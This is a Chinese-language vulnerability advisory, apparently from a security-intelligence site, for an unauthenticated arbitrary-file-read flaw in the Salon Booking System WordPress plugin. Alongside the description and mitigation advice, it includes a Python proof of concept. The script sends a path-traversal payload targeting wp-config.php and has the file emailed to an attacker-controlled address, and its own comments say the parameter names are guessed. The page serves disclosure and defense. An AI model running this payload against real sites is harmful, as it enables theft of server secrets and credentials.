IPBUF安全漏洞报告
English
CVE-2026-6320 CVSS 7.5 高危

CVE-2026-6320 WordPress插件任意文件读取漏洞

披露日期: 2026-05-02
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-6320
漏洞类型
任意文件读取
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Salon Booking System – Free Version

相关标签

WordPress插件漏洞任意文件读取路径遍历信息泄露Salon Booking System

漏洞概述

WordPress的Salon Booking System插件在10.30.25及之前版本中存在任意文件读取漏洞。该漏洞允许未经身份验证的攻击者利用公共预订流程,通过控制文件字段值,将恶意路径作为邮件附件,从而读取服务器上的任意本地文件并外泄。

技术细节

该漏洞的根本原因在于插件对公共预订流程中输入的文件字段值缺乏足够的验证和清洗。攻击者可以在预订请求中注入包含路径遍历序列(如../)的恶意路径。插件在生成预订确认邮件时,错误地将此用户输入的值直接视为受信任的文件系统路径来附加文件。由于该操作无需管理员权限,攻击者可借此读取服务器上的敏感配置文件(如wp-config.php)或其他任意文件,并通过邮件系统将数据传输到外部,造成严重的信息泄露风险。

攻击链分析

STEP 1
侦察
攻击者识别目标网站是否安装了受影响版本的Salon Booking System插件(<= 10.30.25)。
STEP 2
漏洞利用
攻击者向公共预订接口发送特制的POST请求,在文件字段参数中注入路径遍历Payload(如../../etc/passwd),并将接收邮箱设置为攻击者控制的地址。
STEP 3
数据窃取
服务器处理请求时,读取指定路径的文件并将其作为附件发送到预订确认邮件中。攻击者通过接收邮件获取服务器上的敏感文件。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (replace with actual target) target_url = "http://example.com/wp-admin/admin-ajax.php" # Attacker controlled email to receive the exfiltrated file attacker_email = "[email protected]" # Path traversal payload to read sensitive file # Payload attempts to read wp-config.php file_path_payload = "../../../../../../../../wp-config.php" # Data payload based on the vulnerable booking flow parameters # Note: Parameter names (e.g., 'action', 'booking_data') need to be confirmed via specific plugin analysis payload = { "action": "sbs_booking_submit", "sbs_email": attacker_email, "sbs_file_field": file_path_payload # The vulnerable parameter accepting the path } try: response = requests.post(target_url, data=payload) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check the attacker's email inbox for the attachment containing the file content.") else: print("[-] Request failed.") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

Salon Booking System <= 10.30.25

防御指南

临时缓解措施
建议立即将Salon Booking System插件更新至修复了该漏洞的最新版本。如果无法立即升级,应考虑临时禁用该插件或在服务器层面(如通过ModSecurity)部署过滤规则,阻止包含“../”或绝对路径字符的请求提交给插件。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表